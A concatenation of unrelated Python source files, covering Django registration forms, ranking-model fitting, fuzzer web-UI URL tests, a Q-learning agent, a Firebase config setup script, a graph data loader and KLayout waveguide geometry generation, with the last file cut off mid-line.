""" class HttpUnauthorized(HttpClientError): """ Called when the server sends a 401 error (when you don't provide a valid OAuth token) """ class HttpNotFoundError(HttpClientError): """ Called when the server sends a 404 error. """ class HttpNotAccessibleError(HttpClientError): """ Called when the server sends a 410 error. """ class HttpTooManyRequests(HttpClientError): """ Called when the server sends a 429 error (when you've gone over your request rate limit) """ class HttpServerError(MeetupHttpBaseException): """ Called when the server tells us there was a server error (5xx). """ blueridger/HiFi-Registrationhifireg/registration/forms/registration.py1-10 from django.conf import settings from django import forms from django.core.exceptions import ValidationError from django.core.validators import MinValueValidator, MaxValueValidator from registration.models import CompCode, Order, Registration, Volunteer, CompCodeHelper YESNO = [(True, 'Yes'), (False, 'No')] class BetaPasswordForm(forms.Form): beta_password = forms.CharField(widget=forms.PasswordInput) def clean(self): cleaned_data = super().clean() password = cleaned_data.get('beta_password') if password != settings.BETA_PASSWORD: raise forms.ValidationError('Beta password is not correct') class RegisterPolicyForm(forms.ModelForm): class Meta: model = Registration fields = ['agrees_to_policy'] def clean_agrees_to_policy(self): agrees = self.cleaned_data.get('agrees_to_policy') if not agrees: raise forms.ValidationError('You must agree to the terms to proceed.') return agrees class RegVolunteerForm(forms.ModelForm): class Meta: model = Registration fields = ['wants_to_volunteer'] widgets = { 'wants_to_volunteer': forms.Select(choices=YESNO), } def __init__(self, *args, **kwargs): super(RegVolunteerForm, self).__init__(*args, **kwargs) self.fields['wants_to_volunteer'].required = True class RegVolunteerDetailsForm(forms.ModelForm): class Meta: model = Volunteer fields = [ 'cellphone_number', 'hours_max', 'image', 'skills', 'cantwont', ] widgets = { 'hours_max': forms.NumberInput(attrs={'min': 1, 'max': 8, 'value': 3}) } def __init__(self, *args, **kwargs): super(RegVolunteerDetailsForm, self).__init__(*args, **kwargs) self.fields['cellphone_number'].required = True self.fields['hours_max'].required = True self.fields['hours_max'].validators = [MinValueValidator(1), MaxValueValidator(8)] self.fields['image'].required = True class RegMiscForm(forms.ModelForm): class Meta: model = Registration fields = [ 'mailing_list', 'housing_transport_acknowledgement', 'accommodations', 'referral_code', 'registration_feedback', ] widgets = { 'mailing_list': forms.Select(choices=YESNO), 'housing_transport_acknowledgement': forms.Select(choices=YESNO), } def __init__(self, *args, **kwargs): super(RegMiscForm, self).__init__(*args, **kwargs) self.fields['mailing_list'].required = True self.fields['housing_transport_acknowledgement'].required = True def clean_housing_transport_acknowledgement(self): data = self.cleaned_data.get('housing_transport_acknowledgement') if data is not True: raise forms.ValidationError('You must attend to your own housing and transportation needs.') return data class RegCompCodeForm(forms.Form): code = forms.CharField(label='If so, please enter your comp code here:', max_length=CompCodeHelper.CODE_LENGTH, required=False) def clean(self): code = self.cleaned_data.get('code') if code: if not CompCode.objects.filter(code=code).exists(): raise ValidationError('That is not a valid comp code!') comp_code = CompCode.objects.get(code=code) if comp_code.max_uses <= comp_code.registration_set.count(): raise ValidationError('That code is already expended.') return self.cleaned_data class RegisterDonateForm(forms.ModelForm): class Meta: model = Order fields = ['donation'] widgets = {'donation': forms.HiddenInput()} 0 # Fit standard Plackett-Luce model to triplet sushi data via MM ## Global variables set in utils.py: epsilon, rtol, n_iter ## load data and initialize MM method as in run_methods: init_all_methods_real_data import numpy as np import cvxpy as cp from scipy.sparse import save_npz, load_npz from utils import * dir = 'sushi_dectet_' ### load data rankings_train = np.load('../data/' + dir + 'data/' + 'rankings.npy') X = np.load('../data/' + dir + 'data/' + 'features.npy').astype(float) mat_Pij = load_npz('../data/' + dir + 'data/' + 'mat_Pij.npz') endog = rankings_train[:, 0] exog = rankings_train ### Initialization, start from a feasible point for all parameters (beta_init, b_init, time_beta_b_init), (pi_init, time_pi_init), (u_init, time_u_init), \ (theta_init, time_theta_init), (exp_beta_init, time_exp_beta_init) = \ init_params(X, rankings_train, mat_Pij, method_beta_b_init='QP') ### Log all results log_dict = dict() ### mm parameters log_dict['mm_conv'] = False log_dict['pi_mm'] = np.copy(pi_init) log_dict['diff_pi_mm'] = [np.linalg.norm(log_dict['pi_mm'])] log_dict['obj_mm'] = [objective(log_dict['pi_mm'], rankings_train)] log_dict['iter_mm'] = 0 ## Run MM method and save logged results from only_scores import * import pickle n = X.shape[0] # number of items for iter in range(n_iter): # mm update if not log_dict['mm_conv']: log_dict['pi_mm_prev'] = log_dict['pi_mm'] log_dict['pi_mm'], time_mm_iter = mm_iter(n, rankings_train, weights=log_dict['pi_mm']) if np.any(np.isnan(log_dict['pi_mm'])): log_dict['mm_conv'] = True else: log_dict['diff_pi_mm'].append(np.linalg.norm(log_dict['pi_mm_prev'] - log_dict['pi_mm'])) log_dict['obj_mm'].append(objective(log_dict['pi_mm'], rankings_train)) log_dict['iter_mm'] += 1 log_dict['mm_conv'] = np.linalg.norm(log_dict['pi_mm_prev'] - log_dict['pi_mm']) < rtol * np.linalg.norm(log_dict['pi_mm']) # stop if converged if log_dict['mm_conv']: break # Save results as a csv file save_name = 'mm' with open('../results/' + dir + 'data/' + '_logs_' + save_name + '.pickle', "wb") as pickle_out: pickle.dump(log_dict, pickle_out) pickle_out.close() # read data import pandas as pd object = pd.read_pickle(r'../results/' + dir + 'data/' + '_logs_' + save_name + '.pickle') object["mm_conv"] np.round_(object["pi_mm"], 3) """ .. code-author: <>, AGH University of Science and Technology """ import aenum from overwatch.base import config from overwatch.database.mongoDatabaseFactory import MongoDatabaseFactory from overwatch.database.zodbDatabaseFactory import ZodbDatabaseFactory (databaseParameters, _) = config.readConfig(config.configurationType.database) class databaseTypes(aenum.OrderedEnum): mongodb = 0 zodb = 1 def getDatabaseFactory(): """ Creates database factory object using parameters specified in config.yaml. Args: None Returns: Database factory object. """ databaseType = databaseParameters["databaseType"] if databaseTypes[databaseType] == databaseTypes.mongodb: return MongoDatabaseFactory( databaseName=databaseParameters["databaseName"], host=databaseParameters["mongoHost"], port=databaseParameters["mongoPort"]) if databaseTypes[databaseType] == databaseTypes.zodb: return ZodbDatabaseFactory( databaseLocation=databaseParameters["databaseLocation"]) sears-s/fluffi # Copyright 2017-2020 Siemens AG # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including without # limitation the rights to use, copy, modify, merge, publish, distribute, # sublicense, and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR # OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, # ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. # # Author(s): , import unittest from app import app, models class TestURLs(unittest.TestCase): def setUp(self): self.client = app.test_client() fuzzjob = models.Fuzzjob.query.first() if fuzzjob and hasattr(fuzzjob, "ID"): self.projId = fuzzjob.ID else: print("Error: No fuzzjob exists for testing!") def test_root_redirect(self): """ Tests if the root URL gives a 200 """ result = self.client.get("/") self.assertEqual(result.status_code, 200) def test_projects_redirect(self): """ Tests if the projects URL gives a 200 """ result = self.client.get("/projects") self.assertEqual(result.status_code, 200) def test_locations_redirect(self): """ Tests if the locations URL gives a 200 """ result = self.client.get("/locations") self.assertEqual(result.status_code, 200) def test_commands_redirect(self): """ Tests if the commands URL gives a 200 """ result = self.client.get("/commands") self.assertEqual(result.status_code, 200) def test_hangs_redirect(self): """ Tests if the hangs URL gives a 200 """ result = self.client.get("/projects/{}/hangs/1".format(self.projId)) self.assertEqual(result.status_code, 200) def test_population_redirect(self): """ Tests if the population URL gives a 200 """ result = self.client.get("/projects/{}/population/1".format(self.projId)) self.assertEqual(result.status_code, 200) def test_violations_redirect(self): """ Tests if the violations URL gives a 200 """ result = self.client.get("/projects/{}/violations".format(self.projId)) self.assertEqual(result.status_code, 200) def test_view_projects_redirect(self): """ Tests if the view projects URL gives a 200 """ result = self.client.get("/projects/view/{}".format(self.projId)) self.assertEqual(result.status_code, 200) def test_accessVioTotal_redirect(self): """ Tests if the accessVioTotal view URL gives a 200 """ result = self.client.get("/projects/{}/accessVioTotal/1".format(self.projId)) self.assertEqual(result.status_code, 200) def test_accessVioUnique_redirect(self): """ Tests if the accessVioUnique view URL gives a 200 """ result = self.client.get("/projects/{}/accessVioUnique/1".format(self.projId)) self.assertEqual(result.status_code, 200) def test_totalCrashes_redirect(self): """ Tests if the totalCrashes view URL gives a 200 """ result = self.client.get("/projects/{}/totalCrashes/1".format(self.projId)) self.assertEqual(result.status_code, 200) def test_noResponse_redirect(self): """ Tests if the noResponse view URL gives a 200 """ result = self.client.get("/projects/{}/noResponse/1".format(self.projId)) self.assertEqual(result.status_code, 200) if __name__ == '__main__': unittest.main() # AI for the Self Driving Car import numpy as np import random import os import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import torch.autograd as autograd from torch.autograd import Variable # Implements Neural Network specifications class Network(nn.Module): def __init__(self, input_size, number_of_actions): super(Network, self).__init__() self.input_size = input_size self.number_of_actions = number_of_actions # Two connections needed when using only 1 hidden layer (input to hidden and hidden to output) # Each layer is fully connected to eachother due to nn.Linear # The hidden layer has 30 neurons self.full_connection1 = nn.Linear(input_size, 30) self.full_connection2 = nn.Linear(30, number_of_actions) # Does forward propagation def forward(self, state): # Applies the rectifier activation function on the hidden layer neurons hidden_neurons = F.relu(self.full_connection1(state)) # Obtains Q values from hidden layer neurons q_values = self.full_connection2(hidden_neurons) return q_values # Implements Experience Replay class ExperienceReplay(object): def __init__(self, capacity): self.capacity = capacity self.memory = [] # Pushes a new event to the memory and makes sure the memory is not overcapacity def push(self, event): self.memory.append(event) if len(self.memory) > self.capacity: del self.memory[0] # Samples events from the memory def sample(self, batch_size): samples = zip(*random.sample(self.memory, batch_size)) return map(lambda x: Variable(torch.cat(x, 0)), samples) # Implements Deep Q Learning class DeepQNetwork(): def __init__(self, input_size, number_of_actions, gamma): # Sets the discount factor self.gamma = gamma # Displays average reward of last 100 events self.reward_average = [] # Creates the Neural Network self.model = Network(input_size, number_of_actions) # Creates Experience Replay with capacity of 100,000 self.memory = ExperienceReplay(100000) # Chooses which optimization algorithm to use to reduce the Loss/Cost function, and the Learning Rate self.optimizer = optim.Adam(self.model.parameters(), lr=0.001) # Creates input Tensor with a fake first dimension self.last_state = torch.Tensor(input_size).unsqueeze(0) self.last_action = 0 self.last_reward = 0 # Decides what the next action should be def select_action(self, state): probs = F.softmax(self.model(Variable(state, volatile=True)) * 100) action = probs.multinomial() return action.data[0,0] def learn(self, batch_state, batch_next_state, batch_reward, batch_action): outputs = self.model(batch_state).gather(1, batch_action.unsqueeze(1)).squeeze(1) next_outputs = self.model(batch_next_state).detach().max(1)[0] target = self.gamma * next_outputs + batch_reward td_loss = F.smooth_l1_loss(outputs, target) self.optimizer.zero_grad() td_loss.backward(retain_variables=True) self.optimizer.step() def update(self, reward, new_signal): new_state = torch.Tensor(new_signal).float().unsqueeze(0) self.memory.push((self.last_state, new_state, torch.LongTensor([int(self.last_action)]), torch.Tensor([self.last_reward]))) action = self.select_action(new_state) if len(self.memory.memory) > 100: batch_state, batch_next_state, batch_action, batch_reward = self.memory.sample(100) self.learn(batch_state, batch_next_state, batch_reward, batch_action) self.last_action = action self.last_state = new_state self.last_reward = reward self.reward_average.append(reward) if len(self.reward_average) > 1000: del self.reward_average[0] return action def score(self): return sum(self.reward_average) / (len(self.reward_average) + 1.) def save(self): torch.save({'state_dict': self.model.state_dict(), 'optimizer': self.optimizer.state_dict()}, 'saved_ai.pth') def load(self): if os.path.isfile('saved_ai.pth'): print("Loading checkpoint...") checkpoint = torch.load('saved_ai.pth') self.model.load_state_dict(checkpoint['state_dict']) self.optimizer.load_state_dict(checkpoint['optimizer']) print("Done!") else: print("No checkpoint found...") #!/usr/bin/env python3 import fileinput import os RW_PROJECT_ID = os.environ['RW_PROJECT_ID'] RW_API_KEY = os.environ['RW_API_KEY'] RW_AUTH_DOMAIN = os.environ['RW_AUTH_DOMAIN'] RW_DATABASE_URL = os.environ['RW_DATABASE_URL'] RW_STORAGE_BUCKET = os.environ['RW_STORAGE_BUCKET'] RW_MESSAGING_SENDER_ID = os.environ['RW_MESSAGING_SENDER_ID'] RW_APP_ID = os.environ['RW_APP_ID'] RW_MEASUREMENT_ID = os.environ['RW_MEASUREMENT_ID'] def firebaseFile(): print("firebase file is starting") fileName = ".firebaserc" # read file into memory with open(fileName, 'r') as file : filedata = file.read() # replace variables in place filedata = filedata.replace("RW_PROJECT_ID", RW_PROJECT_ID) # write out updated file with open(fileName, 'w') as file: file.write(filedata) print("firebase file is finished") def localEnvironment(): print("local environment file is starting") fileName = "src/environments/environment.ts" # read file into memory with open(fileName, 'r') as file : filedata = file.read() # replace variables in place filedata = filedata.replace("RW_PROJECT_ID", RW_PROJECT_ID) filedata = filedata.replace("RW_API_KEY", RW_API_KEY) filedata = filedata.replace("RW_AUTH_DOMAIN", RW_AUTH_DOMAIN) filedata = filedata.replace("RW_DATABASE_URL", RW_DATABASE_URL) filedata = filedata.replace("RW_STORAGE_BUCKET", RW_STORAGE_BUCKET) filedata = filedata.replace("RW_MESSAGING_SENDER_ID", RW_MESSAGING_SENDER_ID) filedata = filedata.replace("RW_APP_ID", RW_APP_ID) filedata = filedata.replace("RW_MEASUREMENT_ID", RW_MEASUREMENT_ID) # write out updated file with open(fileName, 'w') as file: file.write(filedata) print("local environment file is finished") def productionEnvironment(): print("production environment file is starting") fileName = "src/environments/environment.prod.ts" # read file into memory with open(fileName, 'r') as file : filedata = file.read() # replace variables in place filedata = filedata.replace("RW_PROJECT_ID", RW_PROJECT_ID) filedata = filedata.replace("RW_API_KEY", RW_API_KEY) filedata = filedata.replace("RW_AUTH_DOMAIN", RW_AUTH_DOMAIN) filedata = filedata.replace("RW_DATABASE_URL", RW_DATABASE_URL) filedata = filedata.replace("RW_STORAGE_BUCKET", RW_STORAGE_BUCKET) filedata = filedata.replace("RW_MESSAGING_SENDER_ID", RW_MESSAGING_SENDER_ID) filedata = filedata.replace("RW_APP_ID", RW_APP_ID) filedata = filedata.replace("RW_MEASUREMENT_ID", RW_MEASUREMENT_ID) # write out updated file with open(fileName, 'w') as file: file.write(filedata) print("production environment file is finished") print("setup environment has started") firebaseFile() localEnvironment() productionEnvironment() print("setup environment has finished")# Copyright 2020 JD.com, Inc. Galileo Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== import os import json import numpy as np import zipfile import networkx from networkx.readwrite import json_graph from galileo.platform.data_source.data_source import DataSource from galileo.platform.data_source.utils import download_url from galileo.platform.log import log if networkx.__version__ != '2.3': raise RuntimeError('please use networkx version 2.3') class PPI(DataSource): url = 'http://snap.stanford.edu/graphsage' def __init__(self, root_dir, name, **kwargs): self.name = name.lower() super().__init__(root_dir, name, **kwargs) @property def raw_dir(self): return os.path.join(self.root_dir, self.name, 'raw') @property def raw_file_names(self): return ['ppi.zip'] def download(self): for name in self.raw_file_names: download_url('{}/{}'.format(self.url, name), self.raw_dir) for name in self.raw_file_names: with zipfile.ZipFile(os.path.join(self.raw_dir, name)) as ppi_zip: ppi_zip.extractall(self.raw_dir) log.info('download ppi done') def read_data(self, prefix, normalize=True): G = json_graph.node_link_graph(json.load(open(prefix + "-G.json"))) if os.path.exists(prefix + "-feats.npy"): feats = np.load(prefix + "-feats.npy") else: print("No features present.. Only identity features will be used.") feats = None id_map = json.load(open(prefix + "-id_map.json")) change_key = lambda n: int(n) id_map = {change_key(k): int(v) for k, v in id_map.items()} class_map = json.load(open(prefix + "-class_map.json")) if isinstance(list(class_map.values())[0], list): change_lab = lambda n: n else: change_lab = lambda n: int(n) class_map = { change_key(k): change_lab(v) for k, v in class_map.items() } for node in G.nodes(): if not 'val' in G.node[node] or not 'test' in G.node[node]: G.remove_node(node) else: if G.node[node]['val']: G.node[node]['node_type'] = 0 elif G.node[node]['test']: G.node[node]['node_type'] = 1 else: G.node[node]['node_type'] = 2 for edge in G.edges(): if (G.node[edge[0]]['val'] or G.node[edge[1]]['val'] or G.node[edge[0]]['test'] or G.node[edge[1]]['test']): G[edge[0]][edge[1]]['edge_type'] = 0 else: G[edge[0]][edge[1]]['edge_type'] = 1 if normalize and not feats is None: from sklearn.preprocessing import StandardScaler train_ids = np.array([ id_map[n] for n in G.nodes() if not G.node[n]['val'] and not G.node[n]['test'] ]) train_feats = feats[train_ids] scaler = StandardScaler() scaler.fit(train_feats) feats = scaler.transform(feats) self.evaluate_vertex_ids = tuple(range(44906, 51420)) self.test_vertex_ids = tuple(range(51420, 56944)) return G, feats, id_map, class_map def convert_to_schema(self): schema = { 'vertexes': [{ "vtype": 0, "entity": "DT_INT64", "weight": "DT_FLOAT", "attrs": [{ "name": "feature1", "dtype": "DT_ARRAY_INT32" }, { "name": "feature2", "dtype": "DT_ARRAY_FLOAT" }] }, { "vtype": 1, "entity": "DT_INT64", "weight": "DT_FLOAT", "attrs": [{ "name": "feature1", "dtype": "DT_ARRAY_INT32" }, { "name": "feature2", "dtype": "DT_ARRAY_FLOAT" }] }, { "vtype": 2, "entity": "DT_INT64", "weight": "DT_FLOAT", "attrs": [{ "name": "feature1", "dtype": "DT_ARRAY_INT32" }, { "name": "feature2", "dtype": "DT_ARRAY_FLOAT" }] }], "edges": [{ "etype": 0, "entity_1": "DT_INT64", "entity_2": "DT_INT64", "weight": "DT_FLOAT", "attrs": [] }, { "etype": 1, "entity_1": "DT_INT64", "entity_2": "DT_INT64", "weight": "DT_FLOAT", "attrs": [] }] } with open(self.schema_path, 'w') as f: json.dump(schema, f) log.info(f'write {self.name} schema done') def convert_to_txt(self): prefix = os.path.join(self.raw_dir, "ppi/ppi") G, feats, id_map, class_map = self.read_data(prefix) out_vertex = open(self.vertex_txt_path, 'w') out_edge = open(self.edge_txt_path, 'w') for node in G.nodes(): node_type = G.node[node]['node_type'] node_id = node node_weight = 1 feature1 = class_map[node] feature1 = ','.join(str(x) for x in feature1) feature2 = list(feats[node]) feature2 = ','.join(str(x) for x in feature2) out_vertex.write( f"{node_type}\t{node_id}\t{node_weight}\t{feature1}\t{feature2}\n" ) for tar in G[node]: edge_type = G[node][tar]['edge_type'] src_id = node dst_id = tar edge_weight = 1 out_edge.write( f"{edge_type}\t{src_id}\t{dst_id}\t{edge_weight}\n") out_vertex.close() out_edge.close() log.info(f'convert {self.name} to graph txt files done') 0 from forte.data.base_pack import PackType from forte.processors.base.writers import JsonPackWriter class DocIdJsonPackWriter(JsonPackWriter[PackType]): # pylint: disable=no-self-use def sub_output_path(self, pack: PackType) -> str: if pack.meta.doc_id is None: raise ValueError( "Cannot use DocIdJsonPackWriter when doc id is not set.") return pack.meta.doc_id + '.json' 10-100 from service.Activation import Activation class NetworkLearning: def applyForwardPropagation(dump, nodes, weights, instance, activation_function): #transfer bias unit values as +1 for j in range(len(nodes)): if nodes[j].get_is_bias_unit() == True: nodes[j].set_net_value(1) #------------------------------ #tranfer instace features to input layer. activation function would not be applied for input layer. for j in range(len(instance) - 1): #final item is output of an instance, that's why len(instance) - 1 used to iterate on features var = instance[j] for k in range(len(nodes)): if j+1 == nodes[k].get_index(): nodes[k].set_net_value(var) break #------------------------------ for j in range(len(nodes)): if nodes[j].get_level() > 0 and nodes[j].get_is_bias_unit() == False: net_input = 0 net_output = 0 target_index = nodes[j].get_index() for k in range(len(weights)): if target_index == weights[k].get_to_index(): wi = weights[k].get_value() source_index = weights[k].get_from_index() for m in range(len(nodes)): if source_index == nodes[m].get_index(): xi = nodes[m].get_net_value() net_input = net_input + (xi * wi) #print(xi," * ", wi," + ", end='') break #iterate on weights end net_output = Activation.activate(activation_function, net_input) nodes[j].set_net_input_value(net_input) nodes[j].set_net_value(net_output) #------------------------------ return nodes def applyBackpropagation(dump, instances, nodes, weights, activation_function, learning_rate, momentum): num_of_features = len(instances[0]) - 1 for i in range(len(instances)): #apply forward propagation first nodes = NetworkLearning.applyForwardPropagation(dump, nodes, weights, instances[i], activation_function) actual_value = instances[i][len(instances[0])-1] predicted_value = nodes[len(nodes) - 1].get_net_value() #print("actual: ",actual_value," - predicted:",predicted_value) small_delta = actual_value - predicted_value nodes[len(nodes) - 1].set_small_delta(small_delta) for j in range(len(nodes)-2, num_of_features, -1): #output delta is already calculated on the step above, that's why len(nodes)-2 #look for connections including from nodes[j] target_index = nodes[j].get_index() sum_small_delta = 0 for k in range(len(weights)): if weights[k].get_from_index() == target_index: affecting_theta = weights[k].get_value() affetcting_small_delta = 1 target_small_delta_index = weights[k].get_to_index() for m in range(len(nodes)): if nodes[m].get_index() == target_small_delta_index: affetcting_small_delta = nodes[m].get_small_delta() break #------------------------- newly_small_delta = affecting_theta * affetcting_small_delta sum_small_delta = sum_small_delta + newly_small_delta #--------------------------- nodes[j].set_small_delta(sum_small_delta) #calculation of small deltas end #------------------------------- #apply stockastic gradient descent to update weights previous_derivative = 0 #applying momentum requires to store previous derivative for j in range(len(weights)): weight_from_node_value = 0 weight_to_node_delta = 0 weight_to_node_value = 0 weight_to_node_net_input = 0 for k in range(len(nodes)): if nodes[k].get_index() == weights[j].get_from_index(): weight_from_node_value = nodes[k].get_net_value() if nodes[k].get_index() == weights[j].get_to_index(): weight_to_node_delta = nodes[k].get_small_delta() weight_to_node_value = nodes[k].get_net_value() weight_to_node_net_input = nodes[k].get_net_input_value() #--------------------------- derivative = weight_to_node_delta * Activation.derivative(activation_function, weight_to_node_value, weight_to_node_net_input) * weight_from_node_value weights[j].set_value(weights[j].get_value() + learning_rate * derivative + momentum * previous_derivative) return nodes, weights def calculate_cost(dump, instances, nodes, weights, activation_function): J = 0 for i in range(len(instances)): instance = instances[i] nodes = NetworkLearning.applyForwardPropagation(dump, nodes, weights, instance, activation_function) predict = nodes[len(nodes)-1].get_net_value() actual = instances[i][len(instances[i])-1] #print("((",predict,"-",actual,")^2)/2 = ", end='') cost = (predict-actual)*(predict-actual) cost = cost / 2 #print(cost) J = J + cost J = J / len(instances) return J import numpy as np import pandas as pd import pandas.util.testing as tm from dask.dataframe.utils import ( _check_dask, _maybe_sort, assert_divisions, assert_sane_keynames, ) def assert_dd_eq( a, b, check_names=True, check_dtypes=True, check_divisions=True, check_index=True, **kwargs, ): if check_divisions: assert_divisions(a) assert_divisions(b) if hasattr(a, "divisions") and hasattr(b, "divisions"): at = type(np.asarray(a.divisions).tolist()[0]) # numpy to python bt = type(np.asarray(b.divisions).tolist()[0]) # scalar conversion assert at == bt, (at, bt) assert_sane_keynames(a) assert_sane_keynames(b) a = _check_dask(a, check_names=check_names, check_dtypes=check_dtypes) b = _check_dask(b, check_names=check_names, check_dtypes=check_dtypes) if not check_index: a = a.reset_index(drop=True) b = b.reset_index(drop=True) if hasattr(a, "to_pandas"): try: a = a.to_pandas(nullable_pd_dtype=False) except TypeError: a = a.to_pandas() if hasattr(b, "to_pandas"): try: b = b.to_pandas(nullable_pd_dtype=False) except TypeError: b = b.to_pandas() if isinstance(a, pd.DataFrame): a = _maybe_sort(a) b = _maybe_sort(b) tm.assert_frame_equal(a, b, **kwargs) elif isinstance(a, pd.Series): a = _maybe_sort(a) b = _maybe_sort(b) tm.assert_series_equal(a, b, check_names=check_names, **kwargs) elif isinstance(a, pd.Index): tm.assert_index_equal(a, b, **kwargs) else: if a == b: return True else: if np.isnan(a): assert np.isnan(b) else: assert np.allclose(a, b) return True Contest/checkPronic.py import math def checkPronic (x) : i = 0 while ( i <= (int)(math.sqrt(x)) ) : if ( x == i * (i + 1)) : return True i = i + 1 return False string = input() res = [string[i: j] for i in range(len(string)) for j in range(i + 1, len(string) + 1)] returner = [] for i in res: if checkPronic(int(i)): returner.append(int(i)) returner.sort() store = set() if len(returner) == 0: print("-1") exit() for i in range(len(returner)-1): if returner[i] not in store and returner[i]!=0: store.add(returner[i]) print(returner[i], end=",") print(returner[len(returner)-1]) #!/usr/bin/python """ vfs.mdstat.failed_devs scripts item This file is part of ZTC and distributed under GNU GPL v.3 Copyright (c) 2010 <> """ from ztc.system.vfs import MDStatus md = MDStatus() md.get('failed_devs') from common.lumerical_lumapi import lumapi from klayout import db from common.common_methods import get_klayout_app_path try: from lumgen.lumgeo import generate_lum_geometry, generate_gds_from_pcell except: from lumgeo import generate_lum_geometry, generate_gds_from_pcell import yaml import os class WaveguideStripGeometry(): def __init__(self, design_file, process_file, lum_app = None): self.lum_app = lum_app self.process_file = process_file self.design_file = design_file self.klayout_app_path = None self.create_gds_klayout_script = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))),"lumgen","create_gds_klayout.py") self.layer = {} self.dbu = 0.001 self.length = 3.0 self.bend_to_straight_margin = 10.0 # Distance from edge of bent waveguide to edge of straight waveguide self.get_geometry_params() self.create_geometry_dirs() def get_geometry_params(self): ''' Get geometry params and GDS layer info (layer number and datatype) GDS layers are defined by a layer number and datatype (i.e. 1/0, 1 is the layer number and 0 is the datatype) Returns ------- None. ''' try: with open(self.design_file) as f: data = yaml.load(f, Loader=yaml.FullLoader) except FileNotFoundError: print("YAML file does not exist... Cannot obtain layer info... Passing...") return except yaml.YAMLError: print("Error in YAML file... Cannot obtain layer info... Passing...") return except TypeError: if type(self.design_file) == tuple: self.design_file = self.design_file[0] with open(self.design_file) as f: data = yaml.load(f, Loader=yaml.FullLoader) # Save tech,lib, pcell names self.techname = data.get('techname','EBeam') self.libname = data.get('libname','EBeam') self.pcellname = data.get('pcellname', 'Waveguide') # Save base geometry params self.width = data['design-params']['width'] self.radius = data['design-params']['radius'] self.bezier = data['design-params']['bezier'] # Save layer source info (i.e. 1:0) for name, info in data['layers'].items(): self.layer[name] = info.split(' - ')[-1] def generate_gds_from_width(self, width): ''' Generate GDS of waveguide GDS is stored in same directory as python file. Parameters ---------- width : float Waveguide width (um) length : float Waveguide length (um) Returns ------- file_dir : str Absolute path of GDS file ''' # TODO: Get technology params # TODO: Use SiEPIC to get tech params (dbu) self.dbu = 0.001 # Create layout object with top cell ly = db.Layout() top = ly.create_cell("TOP") # Define layer(s) ly_number = int(self.layer['Waveguide'].split(':')[0]) ly_datatype = int(self.layer['Waveguide'].split(':')[1]) wg_layer = ly.layer(ly_number, ly_datatype) # Generate geometric shapes wg_geometry = db.Box(0, -self.length/self.dbu/2, width/self.dbu, self.length/self.dbu) # Insert shape(s) into layout under parent cell top.shapes(wg_layer).insert(wg_geometry) # Write to GDS file_dir = os.path.join(self.gds_dir,"Waveguide_w="+str(int(width/self.dbu))+"nm.gds") ly.write(file_dir) print("Created %s" % file_dir) return file_dir def generate_gds_from_params(self, width, radius, bezier): if self.klayout_app_path == None: self.klayout_app_path = get_klayout_app_path() length = radius + self.bend_to_straight_margin gds_path = os.path.join(self.gds_dir,"Waveguide_w={}nm_r={}nm_b={}.gds".format(int(width*1000), int(radius*1000), bezier)) generate_gds_from_pcell(gds_path, self.techname, self.libname, self.pcellname, params = {"path": [[0,0],[length,0], [length,length]], "radius": radius, "widths": [width], "bezier": bezier, "adiab": 1}) return gds_path def sweep_width(self, width_range, resolution): ''' Generate GDS sweep of widths given a resolution Sweep width given the resolution and get as close as possible to the end width range. Parameters ---------- width_range : list List of size 2 where the first number indicates the start of the width sweep (um) and the second indicates the end of sweeping widths (um) resolution : float Amount incremented to get to next width (um) Returns ------- self.width_sweep_mapping: dict Keys = GDS file paths (type: str), Vals = Waveguide widths in um (type: float) ''' print("Create waveguide GDS sweeping widths") self.width_sweep_mapping = {} width = width_range[0] while width <= width_range[1]: self.width_sweep_mapping[self.generate_gds_from_width(width)] = width width = width + resolution return self.width_sweep_mapping def sweep_radius(self, width, radius_range, resolution): ''' Generate GDS sweep of radii given a resolution Sweep radii give the resolution and get as close as possible to the end radius range. Command line commands that work: #C:\\klayout-0.26.6-win64\\klayout_app.exe -b -r C:\\Users\\seanl\\KLayout\\pymacros\\test_python_cmd_line.py -rd bob="hello world" #C:\\klayout-0.26.6-win64\\klayout_app.exe -r "C:\\Users\\seanl\\Documents\\01_UBC\\Academics\\Grad School\\01_Work\\PDK-Generator\\Repo\\PDK-Generator\\python\\lumgen\\create_gds_klayout.py" -rd techname="EBeam" -rd libname="EBeam" -rd pcellname="Waveguide" -rd out_dir="C:\\Users\\seanl\\Downloads\\test7.gds" -rd params="{\\"radius\\": 2}" Parameters ---------- width : float Waveguide width (um) radius_range : list of floats (Size of 2) First entry is the minimum radius, second entry is the max radius. (um) resolution : float Increment size between each radii value. (um) Returns ------- self.radius_sweep_mapping : dict Keys = GDS file location, Vals = Radius (um) ''' print("Create waveguide GDS sweeping radii") print("Running KLayout in command line...") print("NOTE: If you copy and paste the following commands into cmd line, ensure quotations are around file paths so that spaces are captured\n") if self.klayout_app_path == None: self.klayout_app_path = get_klayout_app_path() self.radius_sweep_mapping = {} r = radius_range[0] while r <= radius_range[1]: gds_path = os.path.join(self.gds_dir,"Waveguide_r={}nm.gds".format(int(r*1000))) self.radius_sweep_mapping[gds_path] = r length = r + self.bend_to_straight_margin generate_gds_from_pcell(gds_path, self.techname, self.libname, self.pcellname, params = {"path": [[0,0],[length,0], [length,length]], "radius": r, "widths": [width],"adiab": 